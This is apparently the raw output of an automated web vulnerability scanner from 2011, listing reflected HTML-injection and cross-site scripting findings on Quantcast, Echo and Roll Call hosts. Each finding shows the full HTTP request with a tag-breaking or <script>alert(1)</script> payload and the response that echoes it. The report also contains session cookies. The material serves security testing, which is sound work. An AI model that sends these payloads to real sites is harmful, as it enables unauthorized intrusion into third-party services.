Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utmz=27727020.1297458290.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=27727020.780724242.1297445179.1297458290.1297473023.4; qcVisitor=2|97|1297445121784|21|NOTSET; __utma=14861494.2106100296.1296313950.1297527348.1297539959.9
Response
HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Sun, 13 Feb 2011 01:11:17 GMT
Connection: close
Content-Length: 7819
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; cha ...[SNIP]... <em> dynamic-css screen-optimized.css147b1<a>d42ee9bbe47</em> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f09e"><a>5559fddef87 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /js3f09e"><a>5559fddef87/concat.js?v=2011021312 HTTP/1.1 Host: ak.quantcast.com Proxy-Connection: keep-alive Referer: http://www.quantcast.com/top-sites-1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utmz=27727020.1297458290.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=27727020.780724242.1297445179.1297458290.1297473023.4; qcVisitor=2|97|1297445121784|21|NOTSET; __utma=14861494.2106100296.1296313950.1297527348.1297539959.9
Response
HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Sun, 13 Feb 2011 01:11:01 GMT
Connection: close
Content-Length: 7765

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1cf42<a>c1a0ed6d243 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /js1cf42<a>c1a0ed6d243/concat.js?v=2011021312 HTTP/1.1
Host: ak.quantcast.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/top-sites-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utmz=27727020.1297458290.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=27727020.780724242.1297445179.1297458290.1297473023.4; qcVisitor=2|97|1297445121784|21|NOTSET; __utma=14861494.2106100296.1296313950.1297527348.1297539959.9
Response
HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Sun, 13 Feb 2011 01:11:06 GMT
Connection: close
Content-Length: 7759

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; cha ...[SNIP]... <em> js1cf42<a>c1a0ed6d243 concat.js</em> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72514"><a>fd638ed04c4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /js/concat.js72514"><a>fd638ed04c4?v=2011021312 HTTP/1.1
Host: ak.quantcast.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/top-sites-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utmz=27727020.1297458290.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=27727020.780724242.1297445179.1297458290.1297473023.4; qcVisitor=2|97|1297445121784|21|NOTSET; __utma=14861494.2106100296.1296313950.1297527348.1297539959.9
Response
HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Sun, 13 Feb 2011 01:11:09 GMT
Connection: close
Content-Length: 15253

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2cc25"><a>38b52c7bf64 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /2cc25"><a>38b52c7bf64/themes/quantcast/images/find.png?jcb=1288642643 HTTP/1.1
Host: ak.quantcast.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utmz=27727020.1297458290.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=27727020.780724242.1297445179.1297458290.1297473023.4; qcVisitor=2|97|1297445121784|21|NOTSET; __utma=14861494.2106100296.1296313950.1297527348.1297539959.9
Response
HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Sun, 13 Feb 2011 01:10:44 GMT
Connection: close
Content-Length: 17723

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 519ca"><a>3af54121990 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /519ca"><a>3af54121990/themes/quantcast/images/home_search_gradient.png?jcb=1288361934 HTTP/1.1
Host: ak.quantcast.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utmz=27727020.1297458290.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=27727020.780724242.1297445179.1297458290.1297473023.4; qcVisitor=2|97|1297445121784|21|NOTSET; __utma=14861494.2106100296.1296313950.1297527348.1297539959.9
Response
HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Sun, 13 Feb 2011 01:10:41 GMT
Connection: close
Content-Length: 17819

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 645d4"><a>6c010025b92 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /645d4"><a>6c010025b92/themes/quantcast/images/sign_in.png?jcb=1288642643 HTTP/1.1
Host: ak.quantcast.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utmz=27727020.1297458290.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=27727020.780724242.1297445179.1297458290.1297473023.4; qcVisitor=2|97|1297445121784|21|NOTSET; __utma=14861494.2106100296.1296313950.1297527348.1297539959.9
Response
HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Sun, 13 Feb 2011 01:10:43 GMT
Connection: close
Content-Length: 17741

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f2fa"><a>0d5a5d86ed1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /4f2fa"><a>0d5a5d86ed1/themes/quantcast/images/sociable_facebook.gif?jcb=1288361934 HTTP/1.1
Host: ak.quantcast.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utmz=27727020.1297458290.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=27727020.780724242.1297445179.1297458290.1297473023.4; qcVisitor=2|97|1297445121784|21|NOTSET; __utma=14861494.2106100296.1296313950.1297527348.1297539959.9
Response
HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Sun, 13 Feb 2011 01:10:44 GMT
Connection: close
Content-Length: 17801

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5705"><a>26052ea36f9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /a5705"><a>26052ea36f9/themes/quantcast/images/sociable_follow.gif?jcb=1288361934 HTTP/1.1
Host: ak.quantcast.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utmz=27727020.1297458290.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=27727020.780724242.1297445179.1297458290.1297473023.4; qcVisitor=2|97|1297445121784|21|NOTSET; __utma=14861494.2106100296.1296313950.1297527348.1297539959.9
Response
HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Sun, 13 Feb 2011 01:10:43 GMT
Connection: close
Content-Length: 17789

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f455f"><a>e45c460b85b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /f455f"><a>e45c460b85b/themes/quantcast/images/sociable_rss.gif?jcb=1288361934 HTTP/1.1
Host: ak.quantcast.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utmz=27727020.1297458290.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=27727020.780724242.1297445179.1297458290.1297473023.4; qcVisitor=2|97|1297445121784|21|NOTSET; __utma=14861494.2106100296.1296313950.1297527348.1297539959.9
Response
HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Sun, 13 Feb 2011 01:10:42 GMT
Connection: close
Content-Length: 17771

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d063"><a>0c61679f0f5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /3d063"><a>0c61679f0f5/themes/quantcast/images/sociable_twitter.gif?jcb=1288361934 HTTP/1.1
Host: ak.quantcast.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utmz=27727020.1297458290.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=27727020.780724242.1297445179.1297458290.1297473023.4; qcVisitor=2|97|1297445121784|21|NOTSET; __utma=14861494.2106100296.1296313950.1297527348.1297539959.9
Response
HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Sun, 13 Feb 2011 01:10:42 GMT
Connection: close
Content-Length: 17795

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39bdf"><a>13860d90ae5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /39bdf"><a>13860d90ae5/themes/quantcast/images/sociable_youtube.gif?jcb=1288361934 HTTP/1.1
Host: ak.quantcast.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utmz=27727020.1297458290.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=27727020.780724242.1297445179.1297458290.1297473023.4; qcVisitor=2|97|1297445121784|21|NOTSET; __utma=14861494.2106100296.1296313950.1297527348.1297539959.9
Response
HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Sun, 13 Feb 2011 01:10:42 GMT
Connection: close
Content-Length: 17795

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of the q request parameter is copied into the HTML document as plain text between tags. The payload a90be<a>bcb7b76ec90 was submitted in the q parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /v1/search?callback=jsonp1297694123687&q=childrenof%3Ahttp%3A%2F%2Fwww.aboutecho.com%2Fe2%2Ftweets%2Fe2launch+user.id%3Awww.twitter.com%2Fchrissaad%2Cwww.twitter.com%2Fcailloux2007%2Cwww.twitter.com%2Fwadcom%2Cwww.twitter.com%2Flevwalkin%2Cwww.twitter.com%2Fechoenabled%2Cwww.twitter.com%2Fechostatus%2Cwww.twitter.com%2Fkhrisloux+tags%3Aecho+-state%3ASystemFlagged%2CModeratorDeleted+children+-state%3ASystemFlagged%2CModeratorDeleted+sortOrder%3AreverseChronological+itemsPerPage%3A4+sanitizeHTML%3Afalse+a90be<a>bcb7b76ec90&since=1297696287.550508&appkey=prod.echocorp HTTP/1.1
Host: api.echoenabled.com
Proxy-Connection: keep-alive
Referer: http://aboutecho.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Connection: close
Server: Yaws/1.85 Yet Another Web Server
Date: Mon, 14 Feb 2011 15:12:25 GMT
Content-Length: 139
Content-Type: application/x-javascript; charset="utf-8"
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 88481<script>alert(1)</script>92322cffddd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /css88481<script>alert(1)</script>92322cffddd/advertising.css HTTP/1.1
Host: cdn.rollcall.com
Proxy-Connection: keep-alive
Referer: http://www.rollcall.com/news/-203351-1.html
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ecjmlujo8iniv4b8dcvl4mm7a3
Response
HTTP/1.1 404 Not Found
Date: Sun, 13 Feb 2011 01:13:57 GMT
Server: PWS/1.7.1.2
X-Px: ms iad-agg-n22 ( origin)
P3P: CP="CAO DSP NID CURa ADMa DEVa TAIi CONi OUR DELi SAMi IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml"
Cache-Control: max-age=30
Expires: Sun, 13 Feb 2011 01:14:27 GMT
Age: 0
Content-Length: 257
Content-Type: text/html; charset=ISO-8859-1
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title></head><body>
<h1>Not Found</h1>
<p>The requested URL /css88481<script>alert(1)</script>92322cffddd/advertising.css was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e96f8<script>alert(1)</script>08f3bce704f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /csse96f8<script>alert(1)</script>08f3bce704f/article.css HTTP/1.1
Host: cdn.rollcall.com
Proxy-Connection: keep-alive
Referer: http://www.rollcall.com/news/-203351-1.html
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ecjmlujo8iniv4b8dcvl4mm7a3
Response
HTTP/1.1 404 Not Found
Date: Sun, 13 Feb 2011 01:13:55 GMT
Server: PWS/1.7.1.2
X-Px: ms iad-agg-n22 ( iad-agg-n19), ms iad-agg-n19 ( origin)
P3P: CP="CAO DSP NID CURa ADMa DEVa TAIi CONi OUR DELi SAMi IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml"
Cache-Control: max-age=30
Expires: Sun, 13 Feb 2011 01:14:25 GMT
Age: 0
Content-Length: 253
Content-Type: text/html; charset=ISO-8859-1
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title></head><body>
<h1>Not Found</h1>
<p>The requested URL /csse96f8<script>alert(1)</script>08f3bce704f/article.css was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 45927<script>alert(1)</script>b484d9c859d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /css45927<script>alert(1)</script>b484d9c859d/boxes.css HTTP/1.1
Host: cdn.rollcall.com
Proxy-Connection: keep-alive
Referer: http://www.rollcall.com/news/-203351-1.html
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ecjmlujo8iniv4b8dcvl4mm7a3
Response
HTTP/1.1 404 Not Found
Date: Sun, 13 Feb 2011 01:13:54 GMT
Server: PWS/1.7.1.2
X-Px: ms iad-agg-n22 ( iad-agg-n25), ms iad-agg-n25 ( origin)
P3P: CP="CAO DSP NID CURa ADMa DEVa TAIi CONi OUR DELi SAMi IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml"
Cache-Control: max-age=30
Expires: Sun, 13 Feb 2011 01:14:24 GMT
Age: 0
Content-Length: 251
Content-Type: text/html; charset=ISO-8859-1
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title></head><body>
<h1>Not Found</h1>
<p>The requested URL /css45927<script>alert(1)</script>b484d9c859d/boxes.css was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 699ae<script>alert(1)</script>e5787482e71 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /css699ae<script>alert(1)</script>e5787482e71/grid.css HTTP/1.1
Host: cdn.rollcall.com
Proxy-Connection: keep-alive
Referer: http://www.rollcall.com/news/-203351-1.html
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ecjmlujo8iniv4b8dcvl4mm7a3
Response
HTTP/1.1 404 Not Found
Date: Sun, 13 Feb 2011 01:13:53 GMT
Server: PWS/1.7.1.2
X-Px: ms iad-agg-n22 ( iad-agg-n34), ms iad-agg-n34 ( origin)
P3P: CP="CAO DSP NID CURa ADMa DEVa TAIi CONi OUR DELi SAMi IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml"
Cache-Control: max-age=30
Expires: Sun, 13 Feb 2011 01:14:23 GMT
Age: 0
Content-Length: 250
Content-Type: text/html; charset=ISO-8859-1
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title></head><body>
<h1>Not Found</h1>
<p>The requested URL /css699ae<script>alert(1)</script>e5787482e71/grid.css was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload cc415<script>alert(1)</script>6fd79fd852e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /csscc415<script>alert(1)</script>6fd79fd852e/landing.css HTTP/1.1
Host: cdn.rollcall.com
Proxy-Connection: keep-alive
Referer: http://www.rollcall.com/news/-203351-1.html
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
